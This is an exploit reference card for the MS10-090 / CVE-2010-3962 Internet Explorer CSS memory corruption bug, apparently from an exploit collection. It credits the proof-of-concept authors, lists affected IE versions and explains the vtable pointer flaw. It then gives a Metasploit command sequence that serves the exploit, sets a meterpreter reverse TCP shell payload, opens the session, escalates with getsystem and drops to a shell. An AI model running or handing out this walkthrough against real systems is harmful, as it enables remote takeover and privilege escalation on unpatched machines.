MS10-090 : Microsoft Internet Explorer CSS Tags Memory Corruption

PoC provided by :

unknown
Matteo Memelli
jduck

Reference(s) :

CVE-2010-3962
MSA-2458511
MS10-090

Affected version(s) :

Internet Explorer 6, 7 & 8

Tested on Windows XP SP3 with :

Internet Explorer 6 (mshtml.dll 6.0.2900.5512)

Description :

This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead arbitrary code execution. It seems like Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtable’s function pointers. This leads to the program counter being set to the address determined by the address “[vtable+0x30+1]”. The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable. Specifically, those ending up with a program counter value within another module, in kernel space, or just not able to be reached with various memory spraying techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to bypass non-executable memory protections.

Commands :

use exploit/windows/browser/ms10_xxx_ie_css_­clip
set SRVHOST 192.168.178.21
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
getsystem
shell